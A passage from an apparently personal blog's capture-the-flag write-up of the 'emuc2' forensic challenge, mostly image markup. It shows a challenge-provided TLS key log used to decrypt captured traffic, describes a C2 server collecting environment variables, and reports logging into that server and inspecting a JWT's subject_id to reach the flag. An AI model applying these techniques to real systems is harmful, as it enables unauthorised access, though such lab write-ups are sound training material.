class=\"gatsby-resp-image-link\"\n    href=\"/static/7423dfe6403ba06e42db55a8ae416587/5f7fb/image-20240707110911021.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10.833333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVUlEQVQI15XLQQ7AIAgEQNoIAjbGRk3//9Iteui9hwlsFqiNgjYq7j7R54OrNnA2iBWoO1R1ExG4W/DNLPbiX17duiORDGYGpxQzxSNHkbfzPEBEv7zJSyruftMaXgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7423dfe6403ba06e42db55a8ae416587/8ac56/image-20240707110911021.webp 240w,\n/static/7423dfe6403ba06e42db55a8ae416587/d3be9/image-20240707110911021.webp 480w,\n/static/7423dfe6403ba06e42db55a8ae416587/e46b2/image-20240707110911021.webp 960w,\n/static/7423dfe6403ba06e42db55a8ae416587/f992d/image-20240707110911021.webp 1440w,\n/static/7423dfe6403ba06e42db55a8ae416587/4902d/image-20240707110911021.webp 1889w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7423dfe6403ba06e42db55a8ae416587/8ff5a/image-20240707110911021.png 240w,\n/static/7423dfe6403ba06e42db55a8ae416587/e85cb/image-20240707110911021.png 480w,\n/static/7423dfe6403ba06e42db55a8ae416587/d9199/image-20240707110911021.png 960w,\n/static/7423dfe6403ba06e42db55a8ae416587/07a9c/image-20240707110911021.png 1440w,\n/static/7423dfe6403ba06e42db55a8ae416587/5f7fb/image-20240707110911021.png 1889w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7423dfe6403ba06e42db55a8ae416587/d9199/image-20240707110911021.png\"\n            
alt=\"image-20240707110911021\"\n            title=\"image-20240707110911021\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"emuc2forensic\" style=\"position:relative;\"><a href=\"#emuc2forensic\" aria-label=\"emuc2forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>emuc2(Forensic)</h2>\n<blockquote>\n<p>As all good nation states, we have our own malware and C2 for offensive operations. But someone has got the source code and is using it against us! 
Here’s a capture of traffic we found on one of our laptops…</p>\n</blockquote>\n<p>The challenge provides the following key log file and pcap as artifacts.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">SERVER_HANDSHAKE_TRAFFIC_SECRET 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a 1bfc9a265e4ecfc52c64405ec2364a75bcb391c05d2da07fea71aa378dc6f1a4\nEXPORTER_SECRET 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a c4728fd867102154b3797992d8517769fd2930c1322c19e05587c1d0323d1094\nSERVER_TRAFFIC_SECRET_0 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a 31b5fa2f3b7129505d312a2a3ecf8fabc0e84f450bd4e7a79b9a423849b2b47a\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a ddb7df3d1a327bfba9b9e060baedbc1f3e9edfb5deaec8177adc94ea6c778043\nCLIENT_TRAFFIC_SECRET_0 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a 48e788cf9dde473ce9f326aa272b4784bad59c645da5fe91e0c09a9922cdb767\nSERVER_HANDSHAKE_TRAFFIC_SECRET 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa 2cbc2292df70c2e36fcae22de273d76024c770fc5b46d852adb860313dabcf99\nEXPORTER_SECRET 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa af842c754fe7f0109983a0705e85af1051fadbfa962fedc84c7c6cb17fd109f4\nSERVER_TRAFFIC_SECRET_0 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa fcb56de1d6c17cca7791807b03cf662e3730e9f9143fd8327ec4bc7517995f77\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa 10442cc2c1f110bdce7c58a37a89b6d8775c077d601f1ae782d1552cb16cda47\nCLIENT_TRAFFIC_SECRET_0 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa d9bd97f3b6d6632f367878cdd8b0ff38d8590fcb9ebee42fa9954331bb8d4c42\nSERVER_HANDSHAKE_TRAFFIC_SECRET 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 
d5771d32ad0b1422eb3335414349835a98e875874cec846d1e8737d8e1583d59\nEXPORTER_SECRET 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 83a0fffcd8e4795932adf8c6ae8e1aebc02c1b373d218164e0b92605ea47fd64\nSERVER_TRAFFIC_SECRET_0 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 00e2ca1b2581d8fd93b5c88e6a5fccb45f7e166b91c3660c9324c4ac2d317c2d\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf c26cbaa800392054e5f99320da96d7d45d3217f5bf579dd98d9fbf134797e33a\nCLIENT_TRAFFIC_SECRET_0 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 41f038a84afa86698bdcb315d3e4bbec97f97d3fb21c18ee90ff3ec8fec4fa1c\nSERVER_HANDSHAKE_TRAFFIC_SECRET c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 e57fac6e9ee5679b5cc73caa8e03fac485b9b8c52b8d0230a29b3e47620df925\nEXPORTER_SECRET c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 8280482a484454c4924299d37dfeb00d6a4244056fa4117126e3848b320df11e\nSERVER_TRAFFIC_SECRET_0 c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 d66450efcfaa5d296ee1ec40077ce5e362fb359c4ba62625ffa558f6f90b7fdb\nCLIENT_HANDSHAKE_TRAFFIC_SECRET c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 39505a4dbda2a26f892bacc83cbd72c62e2e20496c8716246047b3b2f1e57321\nCLIENT_TRAFFIC_SECRET_0 c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 b2f4e1750aaee0b5a948f5c186db239df53b9869f0c3922c70a9e84e983d6b7a</code></pre></div>\n<p>For now, I set this key log file in Wireshark as a TLS master secret log.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 699px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/3fe45/image-20240707144447987.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 84.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACLElEQVQ4y6VU246iUBD0wWj0zWRfBLwLqAgiKKLgBWVQk/Er5v+/oba7R4yXdWeTfagcOM2pru7qQ+GX0oWq1FGvK1BVFdVqFaVSSVAsFlEul1GpVP4JtVoNhX6vi2S/x3q9hmVZmM/nCMNQkCQJ7Y3QaDTQarX+imazKWvBNE2k6QfCxQKTiQvP84R0Qe97SuTYtihn0nsoigLlaV8IDSJMkj1WqxURTmAYBlzXlZU/6Ha76PV6N/C7eT2zXIbyzQOhqRs4UHAxD0iNg95kAIeIbVLGCRiO42A6ncrKyYbDIUYjS1Yu9YFQHw+wO6eI0g2mcw/6nPoYBPCIIKAks9lM4Hk+/Gs7mJTV1ut1IcxJhbCZ2fC/MrhfBzjZAoY9RED9866KvpW6QiKKHVI/HkvpjBeFXPIHmZJsd6TAhzO2MfN9OuhgTM9Mquv6jSBH3s8XQm5+lmXkdCqjYhimGMRjtKUkm81GHOdSuXS93xdTjscj1nH8aoph6DidTrhcLnTAl4CmaQ/IZ+x+3lhdp9P5s0KeQ1biupPboXs8z+AzHkxh+bvdDlEUSWl58Jn0JzwoPBxSnKnsgMblfwjb7XZecirqeCx48x3hT4luJX9+XnA+n8XF3LV3hzRVg0p/Jo3usXoFG8d3m+MFnrPlcok4jmSIOfiu+RzrD3RYngPDGsCi68d/KBbFPLwWclfzpvIovEO71cZ4NkGUbeGGPuIoJkO3covYWL7vvwFLyurBznAR7AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/8ac56/image-20240707144447987.webp 240w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/d3be9/image-20240707144447987.webp 480w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/32d5d/image-20240707144447987.webp 699w\"\n              sizes=\"(max-width: 699px) 100vw, 699px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/8ff5a/image-20240707144447987.png 240w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/e85cb/image-20240707144447987.png 480w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/3fe45/image-20240707144447987.png 699w\"\n            sizes=\"(max-width: 699px) 100vw, 699px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/3fe45/image-20240707144447987.png\"\n            alt=\"image-20240707144447987\"\n            title=\"image-20240707144447987\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This lets us decrypt the TLS packets, so I started looking through the contents.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a61597b62fdc557ad211094a2f7dfc7d/91608/image-20240707134524815.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 21.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5UlEQVQY01XNTU7CQACG4Z5l2qDlDBg7tDSEBW2HAKluVdgUtUgbTXSlMdGlB/CHhamYeBG3brzM67Q0RBZPvndmFmPsyy57LYllWZimiaWZQlQtxFrZ/23uxXaXjNlpxt39E5PpGUcnCceTWSWMRkRqpHdMEA4Jw/KsOxiiBjFSejR2GtjNJru2vWEUyy9+vn95fy4oXlcULx+s3j55uH0k1Z/Ntcs04ybPuM60xUJ3XvVVmpKfX+j3OXmSEPR6GF1XMg76xCricKA4qDdWCt916UiJ325X7Xslr7Z+6ziOXqdeyR+TwJuDCc+B4gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a61597b62fdc557ad211094a2f7dfc7d/8ac56/image-20240707134524815.webp 240w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/d3be9/image-20240707134524815.webp 480w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/e46b2/image-20240707134524815.webp 960w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/e4396/image-20240707134524815.webp 1251w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n  
          />\n          <source\n            srcset=\"/static/a61597b62fdc557ad211094a2f7dfc7d/8ff5a/image-20240707134524815.png 240w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/e85cb/image-20240707134524815.png 480w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/d9199/image-20240707134524815.png 960w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/91608/image-20240707134524815.png 1251w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a61597b62fdc557ad211094a2f7dfc7d/d9199/image-20240707134524815.png\"\n            alt=\"image-20240707134524815\"\n            title=\"image-20240707134524815\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3a1e5fbd1395573319009d672e5c0723/bc3ae/image-20240707135209625.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.750000000000004%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3a1e5fbd1395573319009d672e5c0723/8ac56/image-20240707135209625.webp 240w,\n/static/3a1e5fbd1395573319009d672e5c0723/d3be9/image-20240707135209625.webp 480w,\n/static/3a1e5fbd1395573319009d672e5c0723/e46b2/image-20240707135209625.webp 
960w,\n/static/3a1e5fbd1395573319009d672e5c0723/144c0/image-20240707135209625.webp 1268w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3a1e5fbd1395573319009d672e5c0723/8ff5a/image-20240707135209625.png 240w,\n/static/3a1e5fbd1395573319009d672e5c0723/e85cb/image-20240707135209625.png 480w,\n/static/3a1e5fbd1395573319009d672e5c0723/d9199/image-20240707135209625.png 960w,\n/static/3a1e5fbd1395573319009d672e5c0723/bc3ae/image-20240707135209625.png 1268w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3a1e5fbd1395573319009d672e5c0723/d9199/image-20240707135209625.png\"\n            alt=\"image-20240707135209625\"\n            title=\"image-20240707135209625\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/594816676fa4c2e91f80ed664d98996c/d5c6f/image-20240707135304298.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/594816676fa4c2e91f80ed664d98996c/8ac56/image-20240707135304298.webp 
240w,\n/static/594816676fa4c2e91f80ed664d98996c/d3be9/image-20240707135304298.webp 480w,\n/static/594816676fa4c2e91f80ed664d98996c/e46b2/image-20240707135304298.webp 960w,\n/static/594816676fa4c2e91f80ed664d98996c/8f19f/image-20240707135304298.webp 1261w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/594816676fa4c2e91f80ed664d98996c/8ff5a/image-20240707135304298.png 240w,\n/static/594816676fa4c2e91f80ed664d98996c/e85cb/image-20240707135304298.png 480w,\n/static/594816676fa4c2e91f80ed664d98996c/d9199/image-20240707135304298.png 960w,\n/static/594816676fa4c2e91f80ed664d98996c/d5c6f/image-20240707135304298.png 1261w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/594816676fa4c2e91f80ed664d98996c/d9199/image-20240707135304298.png\"\n            alt=\"image-20240707135304298\"\n            title=\"image-20240707135304298\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After analyzing the packets, I found that this C2 server collects the device’s environment variables and uploads them as files to <code class=\"language-text\">/api/env</code>.</p>\n<p>Also, I eventually found that I could log in to the server running as the C2 service with the following credentials.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 944px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/568e2e2fe50455c27210412994cdcc7e/966a0/image-20240707140002897.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.333333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlUlEQVQY06WQsQ6EIBBE+QQVJUYqLIyCjZ1QEApCQrDx/z9mLkt/lzMWb2eT3ZlimBACwzCA9C1934OFELAsC5RSmOf5J/TzDbpP0wTmvce+7zDGVNVaY9u2R6zrWr0UzO77Rs4ZpRRc14WUEqy1cM79zXmeiDHiOA4wGuM4gnNeO6A+SZ9C/q7rwKSUdWmaBm3bvuYDTzimbzohJQIAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/568e2e2fe50455c27210412994cdcc7e/8ac56/image-20240707140002897.webp 240w,\n/static/568e2e2fe50455c27210412994cdcc7e/d3be9/image-20240707140002897.webp 480w,\n/static/568e2e2fe50455c27210412994cdcc7e/59b61/image-20240707140002897.webp 944w\"\n              sizes=\"(max-width: 944px) 100vw, 944px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/568e2e2fe50455c27210412994cdcc7e/8ff5a/image-20240707140002897.png 240w,\n/static/568e2e2fe50455c27210412994cdcc7e/e85cb/image-20240707140002897.png 480w,\n/static/568e2e2fe50455c27210412994cdcc7e/966a0/image-20240707140002897.png 944w\"\n            sizes=\"(max-width: 944px) 100vw, 944px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/568e2e2fe50455c27210412994cdcc7e/966a0/image-20240707140002897.png\"\n            alt=\"image-20240707140002897\"\n            title=\"image-20240707140002897\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, although I could log in, these credentials still did not allow me to display the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; 
margin-left: auto; margin-right: auto; max-width: 482px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e5ac43fc21bfe516badd46b01808c640/37e0d/image-20240707140046436.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVQoz5WRzWrCQBSF8xJBJT+TiQZiTMRNjRFs/EGN1J2+gIGsUiELN2bVVSm0z9FdX8FN6cZV3+g0d4pWq1C6+DhnbmYu99xIzWYTy+USo9EIQRAIOp2O0Ha7jeFwiDAM4fs+5vM5BoMBGGPgnF9F8jwPeZ4L0jTFdrtFlmWI4xhJkmC1WonzZrPBer3GYrGAYRgXjQ41Sdd1yLKMUqkERVFQLpcFlUpFQDVSqpHXNE1A7wjyh2akkl2v466IEs1mCPv9by0iUtTJZHLUKIrEWrrdLsbjsfDT6VSswDTNnwmrJodn12BbVVhch2tbcBwHjUYDrusKyNOuydeLAUgPd6h+1pC1erDyHYLHd9w87WHev55F+g39kNPzRWTWuoXz8IHe8x7+yydq2dvVpf/FcUJuMDBNhaKqUAuYroEXH42TS//hC6NK+1CjhDm2AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e5ac43fc21bfe516badd46b01808c640/8ac56/image-20240707140046436.webp 240w,\n/static/e5ac43fc21bfe516badd46b01808c640/d3be9/image-20240707140046436.webp 480w,\n/static/e5ac43fc21bfe516badd46b01808c640/da7ca/image-20240707140046436.webp 482w\"\n              sizes=\"(max-width: 482px) 100vw, 482px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e5ac43fc21bfe516badd46b01808c640/8ff5a/image-20240707140046436.png 240w,\n/static/e5ac43fc21bfe516badd46b01808c640/e85cb/image-20240707140046436.png 480w,\n/static/e5ac43fc21bfe516badd46b01808c640/37e0d/image-20240707140046436.png 482w\"\n            sizes=\"(max-width: 482px) 100vw, 482px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/e5ac43fc21bfe516badd46b01808c640/37e0d/image-20240707140046436.png\"\n            alt=\"image-20240707140046436\"\n            title=\"image-20240707140046436\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I captured a HAR file, I found that a JWT token is generated at login, and the flag is requested by sending a POST request to <code class=\"language-text\">/api/flag</code> using that JWT token.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/aba78ae06004b4ae7cfa656d6827bab5/ae21e/image-20240710225240385.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVElEQVQI143MSwqAMAwE0F5HbH62TcXg/Y81huJWcPEYhoQpRwQ2ZezNoHO8HHpOiHdQb2BTcP6wyidJRIRyx4VaaRUTxcjDNFs8R1wIPY0fKbnxALRfPquZhNEqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/aba78ae06004b4ae7cfa656d6827bab5/8ac56/image-20240710225240385.webp 240w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/d3be9/image-20240710225240385.webp 480w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/e46b2/image-20240710225240385.webp 960w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/f992d/image-20240710225240385.webp 1440w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/c3c33/image-20240710225240385.webp 1537w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              
type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/aba78ae06004b4ae7cfa656d6827bab5/8ff5a/image-20240710225240385.png 240w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/e85cb/image-20240710225240385.png 480w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/d9199/image-20240710225240385.png 960w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/07a9c/image-20240710225240385.png 1440w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/ae21e/image-20240710225240385.png 1537w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/aba78ae06004b4ae7cfa656d6827bab5/d9199/image-20240710225240385.png\"\n            alt=\"image-20240710225240385\"\n            title=\"image-20240710225240385\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/29742c030191b401bd702c89e6757f5a/c8ad9/image-20240710225317328.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVQoz41SWa7DIBDLZbLAC0tWEkJf1PsfysW0RGmlqvmwGAbweDwUt1uA0gazWxD+7xjGEdM0YfUe8zzDxTwxDAOstbBdF9fvKIwxqOs6PSB5VVVomgaLX8AzISWEECnHe79QtG2LsiyhtYaPqmQkIFhAKf0kixAJ8icKpVRSRUKSsAofr+sKnjUXVL0pzIQqEoYQQMWsNEYvpfxLyCqv4E1h3/fJK7bMWMdhGWPTnvkrSIT0kAPwsU0mqcg5l9Y8JMbZXymfnspXTpzWg7CL34Ek2cN937FtWwKtoL8smsGOPmNyHYT8YyQRr4mSICvLSnkvg/tPHEPJLXMQPCABY1Y+Kzkr+ubhAyBGLqzJ8gzgAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/29742c030191b401bd702c89e6757f5a/8ac56/image-20240710225317328.webp 240w,\n/static/29742c030191b401bd702c89e6757f5a/d3be9/image-20240710225317328.webp 480w,\n/static/29742c030191b401bd702c89e6757f5a/e46b2/image-20240710225317328.webp 960w,\n/static/29742c030191b401bd702c89e6757f5a/f992d/image-20240710225317328.webp 1440w,\n/static/29742c030191b401bd702c89e6757f5a/156b8/image-20240710225317328.webp 1564w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/29742c030191b401bd702c89e6757f5a/8ff5a/image-20240710225317328.png 240w,\n/static/29742c030191b401bd702c89e6757f5a/e85cb/image-20240710225317328.png 480w,\n/static/29742c030191b401bd702c89e6757f5a/d9199/image-20240710225317328.png 960w,\n/static/29742c030191b401bd702c89e6757f5a/07a9c/image-20240710225317328.png 1440w,\n/static/29742c030191b401bd702c89e6757f5a/c8ad9/image-20240710225317328.png 1564w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/29742c030191b401bd702c89e6757f5a/d9199/image-20240710225317328.png\"\n            alt=\"image-20240710225317328\"\n            title=\"image-20240710225317328\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I decoded this token, it appeared to specify 0 as the <code class=\"language-text\">subject_id</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/5b587/image-20240710225446024.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: 